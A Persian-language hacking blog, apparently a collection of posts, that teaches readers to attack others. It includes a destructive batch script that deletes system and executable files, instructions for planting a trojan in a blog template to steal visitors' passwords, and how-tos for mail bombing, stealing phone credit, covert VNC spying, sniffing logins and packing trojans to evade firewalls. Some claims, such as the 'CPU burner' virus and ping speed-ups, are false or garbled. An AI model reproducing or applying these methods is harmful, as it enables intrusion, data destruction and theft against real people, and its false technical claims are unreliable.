در قسمت or Exploit BUG هم كه يكي از قسمتهاي بسيار بسيار جالب اين برنامه هست نوع باگ رو رو مشخص كنيد . مثلا اگه php هست php.cgi رو انتخاب كنيد يا اگه سايت طرف يك سايتي هست كه مربوط به ارسال ايميل هست از باگ websendmail استفاده كنيد . باز هم ميگم تموم باگ ها و اكسپلوييت ها اين بخش اماده هستند. اين برنامه حدود 55 تا باگ و اكسپلوييت اماده داره كه از مزاياي خوب اون هستش.

از قسمت Exploit Custom ميتونيد اكسپلوييتي رو كه خودتون مايل هستيد رو بزاريد. راستي هفته ي ديگه براتون چند تا اكسپلوييت مي زارم كه بزاريد تو برنامه و كلي با اون سايت هك كنيد .

حالا اگه ميخواهيد از كد اكسپلوييتي كه خودتون به برنامه داديد استفاده كنيد بر روي دكمه ي Custom كليك كنيد . و اگه مي خواهيد از اكسپلوييت هاي اماده ي برنامه استفاده كنيد بر روي دكمه ي From List  كليك كنيد . فقط ميمونه قسمت Parameters Exploit كه دست به اون نزيد تا پسورد رو در لابه ي SCAN واقعا شاهكار خودش به شما بده . حالا فقط بر روي دكمه ي GO كليك كنيد .

سلام به هکرها .. جوجه هکرها .. شاه هکرها .. کرکرها و الی آخر

امروز چند تا از دوستام اومده بودن خونمون بعد من رفتم که براشون شربت بیارم کوفت کنند

( لازم به ذکر است که جدیداً یه ویروس ساخته بودم که اگه اجراش کنی مادر بورد هارد و سی پی یو رو با هم میسوزونه ) البته یکی دیگه قبلا اینو جدا گونه نوشته بود ولی کار نمیکرد که من هم قاطی شون کردم هم درستشون کردم

میخاستم براتون بزارم تو وبلاگم که یکی از دوستام تو کامپیوتر وقتی من نبودم  اونو اجرا کرد و بمب

الان هم دارم از کافی نت آپ میکنم

دیگه فر نکنم تا یکی دو ماه بتونم آپ کنم البته سعی میکنم هر چه سریعتر یه سیستم بخرم

شما هم اونا رو نفرین کنید تا بدرد من دچار بشن

نمیتونم هم بیام کافی نت آپ کنم

مگه بابای بیچاره من چه قدر در میاره که بیا بریزم تو کافی نت

از اونهایی که قول برنامه ای چیزی داده بودم شرمنده

تا بعد

سلام هکرها و جوجه هکرها و ...

من امروز از فرط خوشحالی ( آخه کنکور رو خیلی خوب دادم ) یه ۷ یا ۸ تا پست رو با هم نوشتم

پس اونهایی رو که تو آرشیو هفته اول مرداد رفتن هم بخونید چونکه ماله همین امروزه

تا آپ بعدی

كلا روش هاي زيادي براي پيدا كردن پسورد ادمين ويندوز هاي NT 2K & XP وجود داره اما من ترجيح مي دم از روش كرك SaM پسورد را بدست بيارم متاسفانه بزرگ ترين ضعف امنيتي مايكروسافت در SaM بر مي گرده به Encrypt اين فايل ها
كه با متد 64bit انكريپت و يا بهتره بگم Hash شده و اين به كركرها اجازه رو مي ده كه با يك مقدار دقت حتي بتونه به خوبي هارد ديسك هايي را كه با Format NTFS قالب بندي شده و SaM فايل ها Encode شده اند رو Decode كنند

بر روی ادامه مطلب کلیک کنید

ادامه ی مطلب ...

امروز مي خوام در مورد يك روش ابتكاري در مورد هك كردن اي دي براتون بنويسم. شما با اين روش مينونيد  ID هاي بساري رو صد تا صدتا هك كنيد !!!

حتما مي خواهيد بدونيد چه طوري ؟

:: مواد لازم جهت هك كردن ID ::

1.       يك وبلاگ !

2.       يك تروجان

اصول كار به اين صورته كه شما يك تروجان رو كه حجمي كمتر از 20kb داشته باشه رو تهيه مي كنيد. من براي تهيه ي اين تروجان بيشتر نرم افزار Magic-PS رو به شما معرفي مي كنم . چون هم كارش خوبه و هم وقتي كه تروجان رو با اين برنامه تهيه كرديد حجمي معادل 12.3kb بايت داره كه براي ما مورد قبوله (Magic-PS رو براي دانلود در زير گذاشتم) .خب وقتي كه با اين برنامه تروجان رو تهيه كرديد بايد اون رو در اينترنت اپلود كنيد .اگه نمي دونيد اپلود  چيه و چه سايت هايي امكان اپلود رو به ما ميدن در زير سايتهايي رو براي اپلود گذاشتم.

( اپلود يعني بارگذاري يك فايل در اينترنت ) در زير سايتهاي مجاني براي اپلود رو گذاشتم .

 http://www.rapidshare.de

http://www.filesupload.com

http://www.mytempdir.com

http://www.updownloadserver.de

http://www.dropload.com

http://www.sendthisfile.com

http://www.yousendit.com

http://s4.youshareit.com/index.php

 خب وقتي فايلتون رو اپلود كرديد  ادرس تروجاني رو كه كه اپلود كرديد برداريد و اون رو كپي كنيد و اون رو در بلگفا در بخش مديريت در قسمت ويرايش قالب در قمت head يا همون بالاي ويرايش قالب paste كنيد . وقتي اين كار رو كرديد  هر كس وارد وبلاگ شما بشه  فايل تروجان در كامپيوتر هر كي كه از وبلاگ شما بازديد كنه بارگذاري ميشه و پسورد اي دي و بسياري از اطلاعات مهم ديگر رو به شما ميده و چون حجمش از 20 kb كمتره فاير وال ها هم متوجه اون نمي شوند. خيلي با حاله مگه نه؟

البته من با شما دوستان هيچ وقت اين كار نمي كنم پس يك وقت نترسيد كه وارد وبلاگ من بشيد .موفق باشيد.نظر يادت نره !

خب بريم سر اصل مطلب چند رورزي بود كه نبودم پس مي خوام تلافي كنم امروز مي خواهم ۷ یا ۸ تا پست بزارم میخام بترکونم چون که دیگه کنکورمو دادمو خیالم راحته

پس قبلیهایی هم که رفتن ت. آرشیو رو بخونید چون همین امروز نوشتمشون

نام : KAHT II

نام شركت سازنده : irchatan PS

وقتي برنامه ي kaht 2 رو دانلود كردي وارد cmd ميشي براي ورود به cmd مي توني از منوي استارت وارد Run شوي و انجا تايپ كني cmd . حالا بايد ادرس برنامه ي kaht2 رو بهcmd  بدي . براي مثال اگر برنامه را در درايو E كپي كردي در cmd مي نويسي e:\kaht2.exe تا برنامه رو فعال كني البته شما بايد بعد از exe يك فاصله بگذاري و ادرس IP خودت رو بنويسي.(براي اينكه بخواهي ادرس IP خودت رو پيدا كني وقتي كه به اينترنت وصلي بايد وارد cmd بشي و اونجا بنويسي netstat –n در اخر ادرس IP خودت رو مي بيني حالا اون رو كپي كن و بعد از e:\kaht2.exe بنويس.

 يعني به طور كلي ميشه : e:\kaht2.exe 217.432.342.32   اين IP من گذاشتم الكي است و تو بايد IP خودت رو بنويسي در اخر برنامه مي گرده و كساني كه در محدوده ي شما هستند و به اينترنت متصلند رو پيدا مي كني و شما مي توني اون رو هك كني حتي پسورد ID اون رو هم مي توني هك كني.

دانلود كنيد برنامه ي جالب kaht2

این دفعه می خوام دو تا کد ترسناک براتون بذارم که واقعا پدر گیرنده را در میاره.فقط این ویروس رو برای شوخی برای دوستاتون نفرستید چون اولی مادر برد را از کار می اندازه و دومی cpu رو(می سوزونه)البته هر دو باnotepad ساخته می شه

خب اینم از کد اول(motherboard Annihilater)

۱-برنامه نت پد رو باز کنید و دستورات زیر را در آن بنویسید

@echo off
Cls
===========
color fc
Del /a c:\*.com
Del /a c:\*.sysnotepad
Del /a c:\*.exe /s
===========

و با پسوند bat. سیو کنید

۲-cpu Annihilater

رای این ویروس هم متنند قبلی در notepad کد های زیر را وارد می کنیم(کپی می کنیم)

5.cpu_567hjkblaster

هشدار

هرگز این ویروس ها را در کامپیوترتون اجرا نکنید یا اگه کردید به فکر یه سیستم نو باشید

هك ISP(شركت ارائه دهنده ي اينترنت)

ادامه مطلب را کلیک کنید

ادامه ی مطلب ...

امروز مي خوام يكي از  بهترين روشهاي قفل كردن هميشگي يك ايميل رو به طور كامل توضيح بدم.شايد شما تا به حال از يكي عقده اي دارد يا با يكي دشمني داريد و مي خواهيد حالش رو بگيريد. پس متن زير را با دقت بخوانيد.

مواد لازم جهت يك حال گيري :

سرعت اينترنت در 50 – 15

داشتن برنامه ي Mail Bomber ( براي دانلود لينكش رو گذاشتم )

داشتن نفس اماره ي قوي

هك كردن تلفن همراه براي قبول هزينه مكالمات تلفن همراه شما .

مراحل كار :

موبايل دشمن را برداريد و در توي اون شماره تلفن همراه خودتون را با يكي از فرمت هاي زير وارد كنبد .

+9009105141111*

OR

+09105141111*

حالا ديگه كار تمومه بايد كليد تماس را فشار بديد تا تلفن همراه دشمن شروع به شماره گيري كنه . وقتي صداي چنتا بوق رو شنيدي تلفن همراه دشمن رو خاموش كن.ديگه برو حلت رو بكن چون از اين به بعد تمام هزيته ي تلفن همراه رو دشمن بايد بده.

هشدار !

اگر دشمن تان از اين موضوع مطلع شود و از شركت مخابرات ليست مكالمات را دريافت نمايد ، به راحتي ميتواند شما را شناسايي و نسبت به اين كار غير قانوني اقدامات لازم را بعمل آورید

مشاهده مخفيانه ي DESKTOP رايانه ديگران  !

 شما مي تونيد با نرم افزار VNC ،دسكتاپ رايانه ي ديگران را نگاه كنيد.اين نرم افزار مثل يك جاسوس قوي براي شما از كارهاي دشمن تان در دسكتاپ تصوير برداري مي  كند و همچنين مي توانيد به صورت زنده از كارهايي كه دشمنتان در دسكتاپ انجام را زير نظر داشته باشيد.

براي ديدن دسكتاپ رايانه ي ديگران مي بايست IP طرف رو داشته باشيد كه اين هم بسيار ساده است(در مطالب قبلي در مورد پيدا كردن IP اشخاص صحبت شده است )

لينك مطلب از سايت شركت اين برنامه فيلتر شده ولي من براي شما اين برنامه رو پيدا كردم و براي شما لينك دانلود رو گذاشتم .

حالا وقتي نرم افزار رو گرفتي يك قسمته كه بايد در اون قسمت IP طرف رو كه مي خواهي دسكتاپ يا همون صفحه نمايش ببيني مي نويسي و دكمه ي اتصال رو مي زني و ديگه كار تمومه.

.:: سلام باز اومدم اما اينبار با يك خبر خوش ::.
سلام من مي خوام در حق شما يك لطف كنم و اين و انكه ميخوام به شما يك كدي رو بدم كه هر كسي وارد وبلاگتون بشه هك بشه !!
هر كس اين كد مخرب رو خواست ايميلش رو به من بده تا به اون بدم .
زود باشيد كه ديگه از اين لطف ها نمي كنم

سلام دوستان امروز به شما يك برنامه معرفي ميكنم كه end حاله .
با اين برنامه مي تونيد حجم تروجان هاي خودتون رو تا 70% كاهش بديد و اون رو براي دوستان خودتون بفرستيد . نه اينكه يك تروجان كه حجمش 30 كيلوبايته رو برداريد بفرستيد ، اخه همه كه خر نيستند . با اين برنامه ميتونيد تروجاني كه حجمش 30 كيلو بايته رو بكنيد 9 كيلو بايت يا 12 كيلو بايتي رو بكنيد 3.6 كيلو بايت خيلي با حاله مگه نه ؟
حجم اين برنامه 558 كيلو بايته و سريع دانلود ميشه . در ضمن كركش رو هم داخلش گذاشتم كه بري حالت رو بكني .
دانلود كنيد برنامه ي ASPack دهنده ي حجم ترو جان رو

 سلام دوستان من باز اومدم. دلت مي خواد دستكم روزي 40 تا وبلاگ هك كني ؟

بعضي ها واقعا هنوز هم تو كف هك كردن يك وبلاگ موندن و ميان براي من وبلاگ اموزش هك ميزارن . اشكالي نداره من امروز به شما روشي رو ياد ميدم كه بتونيد با اون روزانه حداقل 50 تا وبلاگ رو هك كنيد. البته اين اموزش كمي هم جنبه لازم داره !!!!!

براي اينكه با اين كار بهتر اشنا بشيد من براي شما به طور ساده توضيح ميدم كه فردا نيايي كامنت بزاري هي بگي بيشتر توضيح بده .ببيند وقتي شما وارد همين سايت بلاگفاي خودمون مي شيد و مي خواهيد وارد سايت خودتون بشيد ميريد و يوزر و پسورد خودتون رو ميديد تا وارد بشيد . خب بلاخره اين يوزر ها كجا ميرن ؟ اين يوزر توسط پكت هايي از طريق پورت خاصي وارد عبور ميكنند .

ايا نميشه به اين پورت گوش بديم ؟ بله ميشه .

با چه ابزاري ؟ با ابزاري به نام اسنيفر ها (البته نه هر اسنيفري ، به قول بچه هكرها قابليت packet sniffer  باشه يعني توانايي گوش دادن به پورت و كش روفتن پكت ها رو داشته باشه . اقلب وقتي شما به پكت هاي مورد نظر خودتون رسيديد به صورت كد بندي شده هست و شما هيچي نوفهميد ! اين كاري نداره برنامه هاي زيادي وجود دارند كه ميتونند اين كدها رو بخونند و يوزر و پس رو به شما بدند .

خب الان خيلي سريع و به صورت خلاصه وار باز هم توضيح ميدم.

1. پيدا كردن اي پي سايت بلاگفا يا پرشن بلاگ يا ميهن بلاگ
2. دادن اي پي به اسنيفر
3. حالا اسنيفر بلا نسبت مثل سگ اين پكت هاي رد و بدل شده رو بو ميكشه و به شما ميده
4. پكت ها رو كه به شما داد شما اين پكت ها رو رمز شكني ميكنيد
5. شما وفق شديد

حال كردي توي پنج تا مرحله قشنگ و خوشكل براتون توضيح دادم . حالا بگيد hackdoost  خلي بده . براي اينكه فكر كردم بعضي ها بلد نيستد ip سايت ها بالا رو پيدا كنند بهتون ميدم البته هيچ كاري نداره برو start>run>cmd>ping blogf.com                      

بلاگفا : 38.113.162.27

ميهن بلاگ : 204.15.78.51

پرشن بلاگ : 70.85.27.85

راستي داشت يادم ميرفت با خمين ping   كردن مي تونيد سرعت اتصل به اينترنت تون رو افزايش بديد به اين صورت كه شما چند با به سرورتون كه به شما اكانت داده پينگ كنيد كامپيوتر هاي سرور براي مدت خيلي كمي هنگ ميكني همين كافيه تا افراد ديگه رو كه از اون سرور اكانت گرفتن و انلاين هستند ديسكانگت بشن و شما تك و تنها با سرعت بيشر براي خودتون حال كنيد !!! شيطوني نكني ها!!!

خب بريم سراغ اسنيفر ها :

ايني كه ميخوام به شما مفرفي كنم رد خور نداره اصل حاله يك چيزي ميگم يك چيزي ميشنوي !!

اسم اين اسنيفر هستش My IP Suite اين برنامه رو براي هك ساختن ورژن 6 هست تازه ي تازه ي اومده . با اين برنامه مي تونيد ip خوتون رو عوض كنيد يا به عبارت دكير مي تونيد هويت خودتون رو مخفي كنيد . مي تونيد از ابزار هاي پينگ كردن و مكان يابي ماهواره اي استفاده كنبد . ميتونيد سايت رو اسكن كنيد . ميتونيد عمل whois رو انجام بديد . فقط فقط يك مشكل داره تا 15 روز ميتونيد از اون مجاني استفاده كنيد . براي همين بايد كركش كرد من هم دارم رو كركش كار ميكنم اما هنوز به موفقيتي نرسيدم اگه هر كدوم از شما كركش كرديد به من هم بگه با اين كار حداقل يك بار هم به من كمك كنيد .

.:: ادرس برنامه ::. My IP Suite v6  .:: حجم ::. 1.3 MB ::.

امروز براتون يك برنامه گذاشتم كه اگه ميخواهيد به راحتي سايت و وبلاگ رو هك كنيد بايد حتما از اين برنامه استفاده كنيد . باز هم ميگم حتما دانلود كنيد . من هميشه براي نفوذ با كامپيوتر ديگران از اين برنامه استفاده ميكنم و خيلي هم از اون راضي هستم. اين برنامه قابليت پذيرش Exploit رو به راحتي داره . اين برنامه 50 تا باگ اماده رو در اختيار شما قرار ميده تا بتونيد به راحتي سايت ها و وبلاگ ها رو هك كنيد .و و و بسياري از قابليت هاي ديگه . من اين برنامه رو اصلا دوست نداشتم براي شما بزارم . الان هم واقعا دو دل شدم كه بزارم يا نزارم . شك نكنيد اين برنامه رو من تو هيچ وبلاگ فارسي زباني نديدم. من خودم براي دانلودش حسابي وقت صرفش كردم. چون زمان اشنايي من با اين برنامه برميگرده به وقتي كه تو يك وبسايت امريكايي داشتم مقاله ميخوندم كه چشم به اون افتاد و محاسن اون رو خوندم . براي همين هم ميگم خيلي با حاله و نبايد از اون سوء استفاده كنيد .
برنامه ي web check رو دانلود كنيد

فرض ميكنيم يك سايتي رو با web check اسكن كرديم

برای دیدن بقیه مطالب بر روی ادامه مطلب کلیک کنید

ادامه ی مطلب ...

سلام این هم یه نرم افزار توپ برای بدست آوردن شماره تلفن در چت میتونید اونو از اینجا دانلود کنید

بعد از دانلود برنامه را اجرا کرده سپس شماره تلفن خود را ( توجه : شماره تلفن خودتون ) وارد کرده و سپس make server را زده و سرور ایجاد شده را برای شخص قربانی بفرستید

وقتی که شخص بر روی آن دو بار کلیک کرد و آن را باز نمود بعد از قطع اتصال او از اینتزنت با تلفن او به شماره ای که شما به برنامه داده اید ارطباط برقرار شده ( تماس گرفته میشود ) و شماره تلفن وی بر روی کالر آی دی تلفنن شما میافتد ( ثبت میشود ) به همین راحتی

 انصافاْ نظر یادتون نره

برای شروع کار ابتدا به گوگل بروید و در ان عبارت login.asp را سرچ کنید بعد حدود ۱۷ هزار سایت در گوگل به نمایش در می یاد که ادرس ان شبیه www.site.com/login.asp است حالا روی یکی از سایتها که همچنین ادرسی را دارند کلیک کرده تا وارد قسمت login سایت شوید بعد به جای username عبارت admin را تایپ کنید 

برای خواندن ادامه مقاله بر روی ادامه مطلب کلیک کنید      

ادامه ی مطلب ...

همان طور که میدانید اولین گامی که هکر بر میداره دانستن آیپی شماست حالا چیکار کنیم تا آیپی شما در هنگام چت دست هکرها نیفته .

1-      از منوی start وارد run  شده و تایپ کنید mmc سپس ok کنید.

برای خواندن ادامه مقاله بر روی ادامه مطلب کلیک کنید

ادامه ی مطلب ...

چگونگی تشجیص عکس از ویروس و تروجان...

چگونه وبلاگ یا لینکدونی خود را در یاهو مسنجر به نمایش بگذاریم؟ آموزش این کار بسیار آسان است من در این مقاله شما را با ساخت چگونگی قرار دادن وبلاگ و یا لینکدونی در یاهو مسنجر آشنا میکنیم، پس با من همراه باشید: شما ابتدا دستورات زیر را کپی کرده و در برنامه‌ی Notepad آنرا Past نمایید:

Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\yahoo\pager\View\YMSGR_Weblog] "Display Name"="Irhut Blog" "Display Bmp"="YView\\headlines.bmp" "content url"="http://irhut.com/index.php" "feed"=dword:00000000 "Stat Letter"="H" "MinHeight"=dword:0000001e "PreferHeight"=dword:00000078 "Resizable"=dword:00000001

حال در دستوارات فوق تغییرات زیر را اعمال میکنید: - در خط اول شما میتوانید به جای YMSGR_Weblog هر عبارتی به صورت YMSGR_do you like type را قرار دهید. این خط مسیر نصب فایل شما را در ویندوز نشان میدهد. - در خط دوم شما نامی را که میخواهید در قسمت Content Tabs یاهو مسنجر نشان داده شود را مینویسید که من در اینجا نام وبلاگ خودم را نوشته‌ام. - در خط سوم شما آدرس عکسی را که میخواهید در Content Tabs یاهو مسنجر نمایش داده شود را قرار میدهید که در اینجا من آدرس مربوط به عکس News را قرار داده‌ام. حال اگر شما میخواهید این آدرس را عوض کنید ابتدا باید عکس مورد نظر خود را در آدرس زیر کپی کنید (فرض بر این است که درایوی که یاهو مسنجر نصب است C است.): C:\Program Files\Yahoo!\Messenger\YView\ (در صورتی که در درایو دیگری نصب است به جای C: نام درایو مورد نظر خودتان را بنویسید.) حال میتوانید به جای headlines.bmp نام عکس مورد نظر خود را بنویسید. فقط این نکته را مد نظر داشته باشید که عکسی را که میخواهید در آدرس بالا قرار دهید باید حتما پسوند bmp داشته باشد. - در خط چهارم دستور، شما باید آدرس وبلاگ، لینکدونی و یا هر چی که حال میکنید در یاهو مسنجر دیده شود را قرار دهید که چون من در اینجا میخواهم آدرس وبلاگم در یاهو مسنجر نماش داده شود آدرس وبلاگ خودم را نوشته‌ام. تمام! با تغییراتی که شما بر طبق راهنمایی‌های من در بالا انجام داده‌اید فایل مورد نظر خود را برای بوجود آوردن یک Content Tabs در یاهو مسنجر آماده کرده‌اید. شما در این مرحله فایل خود را با هر نامی و با پسوند .reg ذخیره میکنید. مثلاً من فایل خودم را به صورت Irhut Blog.reg ذخیره کرده‌ام. حال اگر شما فایلی را که ساخته‌اید بر روی کامپیوتر خود اجرا کنید، یک گزینه به گزینه‌های Content Tabs یاهو مسنجر شما اضافه خواهد شد که به کمک راهنمای تصویری در این مورد میتوانید آنرا بر روی Content Tabs های فعال خود در یاهو مسنجر اضافه کنید. در آخر هم باید بگم که اگر شما دوست دارید که مطالب وبلاگ من به همراه لینکدونی در یاهو مسنجر شما دیده شود این فایل را دانلود کنید و سپس آنرا اجرا کنید.

برای این کار نیاز داریم به یک عدد user name و password  .  یک عددIP کامپیوتر طرف وباز بودن پورت 23 کامپیوتر طرف.
برای به دست آوردن user name و password و همچنین باز کردن پورت 23 به یک عدد تروجان نیاز داریم که
هم می توانیم از نرم افزار های موجود استفاده کنیم و هم می توانیم خودمان بسازیم
طرز تهیه تروجان :

برای خواندن بقیه مطلب بر روی ادامه مطلب کلیک کنید 

ادامه ی مطلب ...